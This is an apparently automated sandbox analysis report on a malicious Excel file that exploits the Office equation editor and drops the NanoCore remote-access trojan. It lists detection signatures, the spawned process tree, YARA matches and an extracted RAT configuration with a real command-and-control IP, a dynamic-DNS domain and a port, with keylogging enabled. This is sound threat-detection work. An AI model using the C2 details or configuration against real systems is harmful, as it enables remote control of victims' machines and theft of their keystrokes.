Play interactive tour

Edit tour

Analysis Report Original title deed.xlsx

Overview

General Information

Sample Name:	Original title deed.xlsx
Analysis ID:	402852
MD5:	ef302d177adde99f0a6f2e8a6bc9eda1
SHA1:	ebc1e702f7334f162571ae83a4810fd870766ee3
SHA256:	caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected Nanocore RAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Writes many files with high entropy

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality for read data from the clipboard

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2400 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2780 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2764 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2804 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2524 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2388 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 3060 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 1620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 552 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2272 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 1688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 1840 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 620 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 1192 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2320 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 1888 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2104 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2252 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2384 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2644 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2448 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2544 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2404 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2324 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2444 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

MSBuild.exe (PID: 2472 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7FB523211C53D4AB3213874451A928AA)

vbc.exe (PID: 2460 cmdline: 'C:\Users\Public\vbc.exe' MD5: 669DD51D521BE84D6F2C45012115FC5F)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": ".0.0.0,", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
